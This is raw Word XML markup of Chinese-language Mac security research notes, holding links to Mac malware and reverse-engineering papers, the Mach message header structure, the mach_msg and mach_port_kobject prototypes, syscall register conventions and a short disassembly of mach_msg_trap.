      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些</w:t>
      </w:r>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下有用的</w:t>
      </w:r>
      <w:r>
        <w:t>analysis Tool, book,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顺带一些</w:t>
      </w:r>
      <w:r>
        <w:t>Sample MD5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRPr="00EB7257" w:rsidRDefault="004106D2" w:rsidP="00EB7257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId97" w:history="1">
        <w:r w:rsidR="00EB7257" w:rsidRPr="006D68E7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://s3.amazonaws.com/s3.synack.com/infiltrate.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRPr="00061FE2" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061FE2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac malware 技术剖析(By 2015-05)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>News and misc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://reverse.put.as/papers/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>Reverse Engineering and Security for fun and pleasure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004317B7" w:rsidRPr="00F416BD" w:rsidRDefault="005E36D3" w:rsidP="00F416BD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc445313344"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MIG--</w:t>
      </w:r>
      <w:r w:rsidR="004317B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mach msg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="004106D2" w:rsidP="00F416BD">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId99" w:history="1">
        <w:r w:rsidR="00F416BD" w:rsidRPr="000B3C12">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://web.mit.edu/darwin/src/modules/xnu/osfmk/man/mach_msg_header.htm</w:t>
        </w:r>
        <w:r w:rsidR="00F416BD" w:rsidRPr="000B3C12">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DE2CC5" w:rsidRDefault="00DE2CC5" w:rsidP="00DE2CC5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc445313345"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD"/>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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>typedef struc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 xml:space="preserve">mach_msg_bits_t </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bits</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mach_msg_size_t</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size</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mach_port_t</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remote_port</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mach_port_t</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local_port</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mach_msg_size_t</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reserved</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="004317B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mach_msg_id_t</w:t>
      </w:r>
      <w:r w:rsidRPr="004317B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                         </w:t>
      </w:r>
      <w:r w:rsidRPr="004317B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msgh_id</w:t>
      </w:r>
      <w:r w:rsidRPr="004317B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRPr="004317B7" w:rsidRDefault="00F416BD" w:rsidP="00F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4317B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>} mach_msg_header_t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD"/>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD"/>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="004106D2" w:rsidP="00F416BD">
      <w:hyperlink r:id="rId100" w:history="1">
        <w:r w:rsidR="00F416BD" w:rsidRPr="000B3C12">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.cnblogs.com/andypeker/p/4385802.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac osx syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:r>
        <w:t>The number of the syscall has to be passed in register rax.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:r>
        <w:t>rdi - used to pass 1st argument to functions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:r>
        <w:t>rsi - used to pass 2nd argument to functions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:r>
        <w:t>rdx - used to pass 3rd argument to functions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:r>
        <w:t>rcx - used to pass 4th argument to functions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:r>
        <w:t>r8 - used to pass 5th argument to functions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:r>
        <w:t>r9 - used to pass 6th argument to functions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="004106D2" w:rsidP="00F416BD">
      <w:hyperlink r:id="rId101" w:history="1">
        <w:r w:rsidR="00F416BD" w:rsidRPr="000B3C12">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://dustin.schultz.io/blog/2010/11/15/mac-os-x-64-bit-assembly-system-calls/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002A566C" w:rsidRDefault="00B1522D" w:rsidP="005E36D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc445313346"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(user)</w:t>
      </w:r>
      <w:r w:rsidR="002A566C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A566C">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="002A566C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ach_msg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00934AD9" w:rsidRDefault="00934AD9" w:rsidP="00F416BD">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00934AD9" w:rsidRDefault="00934AD9" w:rsidP="00F416BD">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00934AD9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\libsyscall\mach\mach_msg.c</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 xml:space="preserve"> *  Routine:    mach_msg</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 xml:space="preserve"> *  Purpose:</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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> *      Send and/or receive a message.  If the message operation</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 xml:space="preserve"> *      is interrupted, and the user did not request an indication</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 xml:space="preserve"> *      of that fact, then restart the appropriate parts of the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934AD9" w:rsidRPr="00934AD9" w:rsidRDefault="00934AD9" w:rsidP="00934AD9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00934AD9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> *      operation.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</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mach_msg_return_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mach_msg</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msg</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option</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send_size</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rcv_size</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rcv_name</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timeout</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 xml:space="preserve"> notify</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msg_header_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00934AD9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00934AD9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msg</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msg_option_t option</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msg_size_t send_size</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msg_size_t rcv_size</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port_t rcv_name</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msg_timeout_t timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00934AD9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934AD9" w:rsidRPr="00934AD9" w:rsidRDefault="00934AD9" w:rsidP="00934AD9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00934AD9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    mach_port_t notify</w:t>
      </w:r>
      <w:r w:rsidRPr="00934AD9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00934AD9" w:rsidRPr="00CA005E" w:rsidRDefault="00934AD9" w:rsidP="00F416BD">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CA005E" w:rsidRPr="00CA005E" w:rsidRDefault="00CA005E" w:rsidP="00CA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CA005E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>libsystem_kernel.dylib`mach_msg_trap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA005E" w:rsidRPr="00CA005E" w:rsidRDefault="00CA005E" w:rsidP="00CA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CA005E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-&gt;  0x7fff93d49c8c &lt;+0&gt;:  mov    r10, rcx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA005E" w:rsidRPr="00CA005E" w:rsidRDefault="00CA005E" w:rsidP="00CA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CA005E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    0x7fff93d49c8f &lt;+3&gt;:  mov    eax, 0x100001f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA005E" w:rsidRPr="00CA005E" w:rsidRDefault="00CA005E" w:rsidP="00CA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CA005E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    0x7fff93d49c94 &lt;+8&gt;:  syscall </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA005E" w:rsidRPr="00CA005E" w:rsidRDefault="00CA005E" w:rsidP="00CA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CA005E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    0x7fff93d49c96 &lt;+10&gt;: ret    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA005E" w:rsidRDefault="00CA005E" w:rsidP="00CA005E">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA005E">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    0x7fff93d49c97 &lt;+11&gt;: nop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001800E2" w:rsidRDefault="001800E2" w:rsidP="001800E2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mach_port_kobject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024660C" w:rsidRDefault="0024660C" w:rsidP="0024660C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kern_return_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_port_kobject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_space_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_port_name_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>natural_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>typep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_vm_address_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>addrp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
